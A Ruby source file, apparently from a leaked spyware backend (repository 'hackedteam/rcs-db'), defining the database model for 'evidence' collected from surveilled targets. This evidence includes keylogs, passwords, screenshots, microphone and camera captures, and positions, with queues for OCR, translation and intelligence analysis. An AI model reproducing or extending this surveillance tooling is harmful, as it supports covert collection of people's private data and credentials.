hackedteam/rcs-db

View on GitHub
lib/rcs-db/db_objects/evidence.rb

Summary

Maintainability
D
3 days
Test Coverage
require 'mongoid'
require 'rcs-common/trace'
require 'rcs-common/keywords'

require_relative '../shard'
require_relative '../position/proximity'
require_relative '../target_scoped'

class Evidence
  include Mongoid::Document
  include RCS::TargetScoped
  include RCS::DB::Proximity
  include RCS::Tracer
  extend RCS::Tracer

  TYPES = ["addressbook", "application", "calendar", "call", "camera", "chat", "clipboard", "device",
           "file", "keylog", "message", "mic", "money", "mouse", "password", "position", "print", "screenshot", "url"]

  STAT_EXCLUSION = ['filesystem', 'info', 'command', 'ip']

  field :da, type: Integer                      # date acquired
  field :dr, type: Integer                      # date received
  field :type, type: String
  field :rel, type: Integer, default: 0         # relevance (tag)
  field :blo, type: Boolean, default: false     # blotter (report)
  field :note, type: String
  field :aid, type: String                      # agent BSON_ID
  field :data, type: Hash
  field :kw, type: Array, default: []           # keywords for full text search

  after_create :create_callback
  before_destroy :destroy_callback

  index({type: 1}, {background: true})
  index({da: 1}, {background: true})
  index({dr: 1}, {background: true})
  index({aid: 1}, {background: true})
  index({rel: 1}, {background: true})
  index({blo: 1}, {background: true})
  index({kw: 1}, {background: true})

  index({'data.position' => "2dsphere"}, {background: true})

  shard_key :type, :da, :aid
  validates_presence_of :type, :da, :aid

  scope :positions, where(type: 'position')
  scope :stats_relevant, not_in(:type => STAT_EXCLUSION)

  def create_callback
    return if STAT_EXCLUSION.include? self.type
    agent = Item.find self.aid
    agent.stat.inc(:"evidence.#{self.type}", 1)
    agent.stat.inc(:"dashboard.#{self.type}", 1)
    agent.stat.inc(:size, self.data.to_s.length)
    agent.stat.inc(:grid_size, self.data[:_grid_size]) unless self.data[:_grid].nil?
    # update the target of this agent
    target = agent.get_parent
    target.stat.inc(:"evidence.#{self.type}", 1)
    target.stat.inc(:"dashboard.#{self.type}", 1)
    target.stat.inc(:size, self.data.to_s.length)
    target.stat.inc(:grid_size, self.data[:_grid_size]) unless self.data[:_grid].nil?
    # update the operation of this agent
    operation = target.get_parent
    operation.stat.inc(:size, self.data.to_s.length)
    operation.stat.inc(:grid_size, self.data[:_grid_size]) unless self.data[:_grid].nil?
  rescue Exception => e
    trace :error, "Cannot update statisting while creating evidence #{e.message}"
  end

  def destroy_callback
    unless self.data['_grid'].nil?
      RCS::DB::GridFS.delete(self.data['_grid'], agent.path.last.to_s) rescue nil
    end

    return if STAT_EXCLUSION.include? self.type
    agent = Item.find self.aid
    return unless agent
    agent.stat.inc(:"evidence.#{self.type}", -1)
    agent.stat.inc(:size, -self.data.to_s.length)
    agent.stat.inc(:grid_size, -self.data['_grid_size']) unless self.data['_grid'].nil?
    # update the target of this agent
    target = agent.get_parent
    target.stat.inc(:"evidence.#{self.type}", -1)
    target.stat.inc(:size, -self.data.to_s.length)
    target.stat.inc(:grid_size, -self.data[:_grid_size]) unless self.data[:_grid].nil?
    # update the operation of this agent
    operation = target.get_parent
    operation.stat.inc(:size, -self.data.to_s.length)
    operation.stat.inc(:grid_size, -self.data[:_grid_size]) unless self.data[:_grid].nil?
  rescue Exception => e
    trace :error, "Cannot update statisting while deleting evidence #{e.message}"
  end

  def target
    @target ||= Item.find(target_id)
  end

  def agent
    @agent ||= Item.find(aid)
  end

  def target_id
    # The class method #target_id is added by TargetScoped
    self.class.target_id
  end

  def may_have_readable_text_or_face?
    type == 'screenshot' or (type == 'file' and data[:type] == :capture) or type == 'camera'
  end

  def translatable?
    %w[keylog chat clipboard message].include?(type)
  end

  def intelligence_relevant?
    %w[addressbook password position url].include?(type)
  end

  def enqueue
    if LicenseManager.instance.check(:connectors)
      return if RCS::DB::ConnectorManager.process_evidence(target, self) == :discard
    end

    # check if there are matching alerts for this evidence
    RCS::DB::Alerting.new_evidence(self)

    # add to the ocr processor queue
    if LicenseManager.instance.check(:ocr) and may_have_readable_text_or_face?
      OCRQueue.add(target.id, id)
    end

    # add to the translation queue
    if LicenseManager.instance.check(:translation) and translatable?
      TransQueue.add(target.id, id)
      data[:tr] = "TRANS_QUEUED"
      save
    end

    # add to the aggregator queue
    if LicenseManager.instance.check(:correlation)
      add_to_aggregator_queue
    end

    add_to_intelligence_queue

    unless STAT_EXCLUSION.include?(type)
      Item.send_dashboard_push(agent, target, target.get_parent)
    end
  end

  def add_to_intelligence_queue
    IntelligenceQueue.add(target_id, id, :evidence) if intelligence_relevant?
  end

  def add_to_aggregator_queue
    AggregatorQueue.add(target_id, id, type)
  end

  def self.create_collection
    # ensure indexes
    create_indexes
    # enable sharding only if not enabled
    RCS::DB::Shard.set_key(collection, {type: 1, da: 1, aid: 1}) unless RCS::DB::Shard.sharded?(collection)
  end

  # Count the number of all the evidences grouped by type.
  # Returns an hash like {"chat" => 3, "mic" => 0, ..., "position" => 42}
  def self.count_by_type(where={})
    match = where.merge(stats_relevant.selector)
    group = {_id: '$type', count: {'$sum' => 1}}
    project = { _id: 0, type: '$_id', count: 1}

    results = collection.aggregate([{'$match' => match}, {'$group' => group}, {'$project' => project}])
    results = results.inject({}) { |h, val| h[val['type']] = val['count']; h }

    defaults = TYPES.inject({}) { |h, type| h[type.to_s] = 0; h }
    defaults.merge!(results)
  end

  def self.dynamic_new(target)
    target(target).new
  end

  def self.deep_copy(src, dst)
    dst.da = src.da
    dst.dr = src.dr
    dst.aid = src.aid.dup
    dst.type = src.type.dup
    dst.rel = src.rel
    dst.blo = src.blo
    dst.data = src.data.dup
    dst.note = src.note.dup unless src.note.nil?
    dst.kw = src.kw.dup unless src.kw.nil?
  end

  def self.report_filter(params)

    filter, filter_hash, target = ::Evidence.common_filter params
    raise "Target not found" if filter.nil?

    # copy remaining filtering criteria (if any)
    filtering = Evidence.target(target[:_id]).not_in(:type => ['filesystem', 'info'])
    filter.each_key do |k|
      filtering = filtering.any_in(k.to_sym => filter[k])
    end

    query = filtering.where(filter_hash).order_by([[:da, :asc]])

    return query
  end

  def self.report_count(params)

    filter, filter_hash, target = ::Evidence.common_filter params
    raise "Target not found" if filter.nil?

    # copy remaining filtering criteria (if any)
    filtering = Evidence.target(target[:_id]).not_in(:type => ['filesystem', 'info'])
    filter.each_key do |k|
      filtering = filtering.any_in(k.to_sym => filter[k])
    end

    num_evidence = filtering.where(filter_hash).count

    return num_evidence
  end

  def self.filtered_count(params)

    filter, filter_hash, target = ::Evidence.common_filter params
    raise "Target not found" if filter.nil?

    # copy remaining filtering criteria (if any)
    filtering = Evidence.target(target[:_id]).stats_relevant
    filter.each_key do |k|
      filtering = filtering.any_in(k.to_sym => filter[k])
    end

    num_evidence = filtering.where(filter_hash).count

    return num_evidence
  end

  def self.common_filter(params)

    # filtering
    filter = {}
    filter = JSON.parse(params['filter']) if params.has_key? 'filter' and params['filter'].is_a? String
    # must duplicate here since we delete the param later but we need to keep the parameter intact for
    # subsequent calls
    filter = params['filter'].dup if params.has_key? 'filter' and params['filter'].is_a? Hash

    # if not specified the filter on the date is last 24 hours
    filter['from'] = Time.now.to_i - 86400 if filter['from'].nil? or filter['from'] == '24h'
    filter['from'] = Time.now.to_i - 7*86400 if filter['from'] == 'week'
    filter['from'] = Time.now.to_i - 30*86400 if filter['from'] == 'month'
    filter['from'] = Time.now.to_i if filter['from'] == 'now'

    filter['to'] = Time.now.to_i if filter['to'].nil?

    # to remove a filter set it to 0
    filter.delete('from') if filter['from'] == 0
    filter.delete('to') if filter['to'] == 0

    filter_hash = {}

    # filter by target
    target = Item.where({_id: filter.delete('target')}).first
    return nil if target.nil?

    # filter by agent
    filter_hash[:aid] = filter.delete('agent') if filter['agent']

    # default filter is on acquired
    date = filter.delete('date')
    date ||= 'da'
    date = date.to_sym

    # date filters must be treated separately
    filter_hash[date.gte] = filter.delete('from') if filter.has_key? 'from'
    filter_hash[date.lte] = filter.delete('to') if filter.has_key? 'to'

    # custom filters for info
    if filter.has_key?('info')
      info = filter.delete('info')
      # backward compatibility
      info = [info].flatten.compact

      filter_for_keywords(info, filter_hash)
      filter_for_position(info, filter_hash)
    end

    # filter on note
    groups_of_words = filter.delete('note')
    # backward compatibility: a string may arrive (instead of an array)
    groups_of_words = [groups_of_words].flatten.compact
    # remove empty string from the array
    groups_of_words = groups_of_words.select { |string| !string.blank? }

    if !groups_of_words.empty?
      filter_hash['$or'] ||= []
      filter_hash['$or'].concat groups_of_words.map { |words| {'kw' => {'$all' => words.keywords}} }
      regexp = groups_of_words.map { |words| "(#{words})"}.join('|')
      filter_hash['note'] = /#{regexp}/i
    end

    return filter, filter_hash, target
  end

  # Check if the first string of the "info" filter is in the form of
  # field_1:value_1,field_2:value_2,...,field_x:value_y
  def self.filter_info_has_key_values? info
    regexp = /^([a-zA-Z]+:[^\,]+(\,|\,\s|$))+$/
    info.size == 1 && info.first =~ regexp
  end

  def self.each_filter_key_value string
    key_values = string.split(',')
    key_values.each do |kv|
      key, value = kv.split(':').map(&:strip)
      key.downcase!

      next if value.blank?
      # special case for email (the field is called "rcpt" but presented as "to")
      key = 'rcpt' if key == 'to'
      yield(key, value) if block_given?
    end
  end

  # If the info array contains a string like "lon:40,lat:10,r:34" than adds
  # a $near filter for the "data.position" attribute.
  def self.filter_for_position(info, filter_hash)
    return unless filter_info_has_key_values?(info)

    lat, lon, r = nil

    each_filter_key_value(info.first) do |k, v|
      lat = v if k == 'lat'
      lon = v if k == 'lon'
      r   = v if k == 'r'
    end

    return unless lat and lon

    filter_hash['geoNear_coordinates'] = [lon, lat].map(&:to_f)
    filter_hash['geoNear_accuracy'] = r.to_i if r
  end

  def self.filter_for_keywords(info, filter_hash)
    if filter_info_has_key_values?(info)
      each_filter_key_value(info.first) do |k, v|
        # special case for $near search
        next if %w[lat lon r].include?(k)

        filter_hash["data.#{k}"] = Regexp.new("#{v}", Regexp::IGNORECASE)
        # add the keyword search to cut the nscanned item
        filter_hash[:kw.all] ||= v.keywords
      end
    elsif !info.empty?
      # otherwise we use it for full text search with keywords
      groups_of_words = info.map { |words|
        keywords = words.strip.keywords
        keywords.empty? ? [words] : keywords
      }

      filter_hash['$or'] ||= []
      filter_hash['$or'].concat groups_of_words.map { |words| {'kw' => {'$all' => words}} }
    end
  end

  def self.offload_move_evidence(params)
    old_target = ::Item.find(params[:old_target_id])
    target = ::Item.find(params[:target_id])
    agent = ::Item.find(params[:agent_id])

    # moving an agent implies that all the evidence are moved to another target
    # we have to remove all the aggregates created from those evidence on the old target
    Aggregate.target(old_target[:_id]).destroy_all(aid: agent[:_id].to_s)

    evidences = Evidence.target(old_target[:_id]).where(:aid => agent[:_id])

    total = evidences.count
    chunk_size = 500
    trace :info, "Evidence Move: #{total} to be moved for agent #{agent.name} to target #{target.name}"

    # move the evidence in chunks to prevent cursor expiration on mongodb
    until evidences.count == 0 do

      evidences = Evidence.target(old_target[:_id]).where(:aid => agent[:_id]).limit(chunk_size)

      # copy the new evidence
      evidences.each do |old_ev|
        # deep copy the evidence from one collection to the other
        new_ev = Evidence.dynamic_new(target[:_id])
        Evidence.deep_copy(old_ev, new_ev)

        # move the binary content
        if old_ev.data['_grid']
          bin = RCS::DB::GridFS.get(old_ev.data['_grid'], old_target[:_id].to_s)

          if bin
            new_ev.data['_grid'] = RCS::DB::GridFS.put(bin.read, {filename: agent[:_id].to_s}, target[:_id].to_s)
            new_ev.data['_grid_size'] = old_ev.data['_grid_size']
          end
        end

        # save the new one
        new_ev.save

        # add to the aggregator queue the evidence (we need to recalculate them in the new target)
        if LicenseManager.instance.check :correlation
          new_ev.add_to_aggregator_queue
        end

        new_ev.add_to_intelligence_queue if LicenseManager.instance.check(:intelligence)

        # delete the old one. NOTE CAREFULLY:
        # we use delete + explicit grid, since the callback in the destroy will fail
        # because the parent of aid in the evidence is already the new one
        old_ev.delete
        RCS::DB::GridFS.delete(old_ev.data['_grid'], old_target[:_id].to_s) unless old_ev.data['_grid'].nil?

        # yield for progress indication
        yield if block_given?
      end

      total = total - chunk_size
      trace :info, "Evidence Move: #{total} left to move for agent #{agent.name} to target #{target.name}" unless total < 0
    end

    # recalculate stats
    old_target.restat
    old_target.get_parent.restat
    target.restat
    target.get_parent.restat

    trace :info, "Evidence Move: completed for #{agent.name}"
  end


  def self.offload_delete_evidence(params)

    conditions = {}

    target = ::Item.find(params['target'])

    if params['agent']
      agent = ::Item.find(params['agent'])
      conditions[:aid] = agent._id.to_s
    end

    conditions[:rel] = params['rel']

    date = params['date']
    date ||= 'da'
    date = date.to_sym
    conditions[date.gte] = params['from']
    conditions[date.lte] = params['to']

    trace :info, "Deleting evidence for target #{target.name} #{params}"

    Evidence.target(target._id.to_s).where(conditions).any_in(:rel => params['rel']).destroy_all

    trace :info, "Deleting evidence for target #{target.name} done."

    # recalculate the stats for each agent of this target
    agents = Item.agents.in(path: [target._id])
    agents.each {|a| a.restat }

    # recalculate for the target
    target.restat

    # recalculate for the operation
    target.get_parent.restat
  end
end